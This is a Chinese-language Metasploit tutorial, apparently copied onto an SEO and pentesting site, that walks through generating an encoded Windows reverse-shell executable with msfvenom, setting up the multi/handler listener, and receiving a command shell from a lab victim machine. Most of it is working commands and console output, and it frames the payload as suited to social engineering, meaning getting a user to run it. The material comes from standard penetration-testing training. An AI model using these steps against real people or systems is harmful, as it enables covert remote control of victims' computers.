seo优化_前端开发_渗透技术Metasploit充满了有趣和有用的功能。其中之一是能够从Metasploit有效负载生成可执行文件的能力。这在诸如社会工程学的情况下非常有用;如果您可以让用户为您运行有效负载,则没有理由去利用任何软件。
让我们看一个简单的例子。我们将生成一个反向Shell有效负载,在远程系统上执行它,并获取我们的Shell。为此,我们将使用命令行工具msfvenom。此命令可用于生成要在许多位置使用的有效负载,并提供从perl到C到raw的各种输出选项。我们对-f exe选项提供的可执行输出感兴趣。
我们将生成Windows反向Shell可执行文件,该可执行文件将通过端口31337连接回我们。
root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
Options for payload/windows/shell/reverse_tcp:
Name: Windows Command Shell, Reverse TCP Stager
Module: payload/windows/shell/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 281
Rank: Normal
Provided by:
spoonm
sf
hdm
skape
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Spawn a piped command shell (staged). Connect back to the attacker
root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 326 (iteration=0) x86/shikata_ga_nai chosen with final size 326 Payload size: 326 bytes Saved as: /tmp/1.exe root@kali:~# file /tmp/1.exe /tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows
现在,我们已经可以使用Windows可执行文件了。现在,我们将使用multi / handler,它是一个处理框架外部启动的漏洞的存根。
root@kali:~# msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Wildcard Target
使用exploit / multi / handler模块时,我们仍然需要告诉它哪个有效负载,因此我们将其配置为与生成的可执行文件相同的设置。
msf exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(handler) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 172.16.104.130 LHOST => 172.16.104.130 msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) >
现在,我们拥有了一切成立,并准备开始,我们利用了 multi/handle 和执行我们产生对受害人的可执行文件。
msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Sending stage (474 bytes) [*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Victim\My Documents>
